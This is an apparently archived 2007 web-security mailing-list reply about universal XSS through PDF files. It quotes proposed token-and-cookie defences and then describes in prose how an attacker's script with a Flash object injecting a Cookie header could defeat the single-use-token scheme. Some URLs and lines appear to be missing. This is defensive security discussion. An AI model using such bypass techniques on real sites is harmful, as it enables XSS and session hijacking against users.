 The solution I could come up with is to tie X to the IP address of the

 client. Yes, I know - it's ugly, and it doesn't work 100% of the 
 cases. But you stand nothing to lose if you simply fall back to the 
 save to disk option, suggested by an anonymous SlashDot submitter (;
 So the more secure solution, as I see it, is as following:
 Apply only for PDF resources:
 IF the URL doesn't contain token_query, then:
calculate X=encrypt_with_key(server_time, client_IP_address)
redirect to file.pdf?token_query=X with Set-Cookie: token_cookie=X 
 to expire at server_time+10sec.
 ELSE IF the URL contains token_query, and token_query==token_cookie 
 and decrypt(token_query).IP_address==client_IP_address and 

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Amit Klein

Guy Podjarny wrote:

Another similar option is to use a single-use random value (not
encrypted), that gets invalidated after it's served back. 

You can save the random value on the (non persistent) session
(server-side), and serve the PDF only if the correct random value is
Once a random value has been used, it's cleared (single-use).

In any case where the wrong value is provided - recreate a random value,
save it on the session, and redirect to the PDF with it (same behavior
as when the token isn't provided at all).


Here's an attack against this scheme:

Attacker sends the user a link to

When the user requests, the 
script.cgi requests file.pdf from It gets back a redirection 
URL and a session cookie. Then, it creates a Flash object that requests 
the URL with an injected Cookie header (with the session cookie) and 
serves this to the victim client. Voila.